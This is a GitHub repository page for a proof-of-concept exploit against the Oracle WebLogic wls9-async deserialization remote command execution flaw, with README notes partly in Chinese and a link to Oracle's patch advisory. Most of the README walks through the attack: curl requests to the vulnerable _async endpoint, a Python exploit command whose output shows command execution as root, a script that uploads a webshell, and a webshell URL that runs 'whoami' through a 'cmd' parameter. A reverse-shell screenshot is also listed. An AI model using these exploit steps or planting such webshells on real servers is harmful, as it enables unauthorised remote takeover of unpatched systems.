Skip to content

jas502n/CNVD-C-2019-48814

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits

cve-2017-10271

cve-2017-10271

 
 

CNVD-C-2019-48814.mp4

CNVD-C-2019-48814.mp4

 
 

README.md

README.md

 
 

burpsuite.jpg

burpsuite.jpg

 
 

command.jpg

command.jpg

 
 

push.sh

push.sh

 
 

python.jpg

python.jpg

 
 

reserve_shell.jpg

reserve_shell.jpg

 
 

webshell.jpg

webshell.jpg

 
 

windows-linux-webshell.jpg

windows-linux-webshell.jpg

 
 

Repository files navigation

CNVD-C-2019-48814

WebLogic wls9-async反序列化远程命令执行漏洞

回显poc for weblogic

Patch update:


https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html

漏洞复现:

http://10.10.20.166:7001/_async/AsyncResponseService

curl -i http://10.10.20.166:7001/_async/favicon.ico

CNVD-C-2019-48814 Video

CNVD-C-2019-48814

python CNVD-C-2019-48814.py -u  http://10.10.20.166:7001  -p 1.txt

>>>>Common See:

write website favicon.ico
Don't Need RMI Server

http://10.10.20.166:7001/_async/favicon.ico

>>>>Request Success!
status_code:202

C:\Users\CTF\Desktop\weblogic\byte>curl -i http://10.10.20.166:7001/_async/favicon.ico
HTTP/1.1 200 OK
Date: Thu, 25 Apr 2019 14:37:49 GMT
Accept-Ranges: bytes
Content-Length: 5
Last-Modified: Thu, 25 Apr 2019 14:37:45 GMT
X-Powered-By: Servlet/2.5 JSP/2.1

root

Use RMI

CVE-2017-10271 No pactch

windows-linux-webshell

upadte: 自定义webshell名字,适用于windows or linux upload webshell

python async_webshell-all.py  http://10.10.20.166:7001/ webshell.jsp
>>>Webshell:
http://10.10.20.166:7001//bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami

resever_shell

command see

webshell

About

WebLogic wls9-async反序列化远程命令执行漏洞

Resources

Readme
Activity

Stars

244 stars

Watchers

10 watching

Forks

97 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages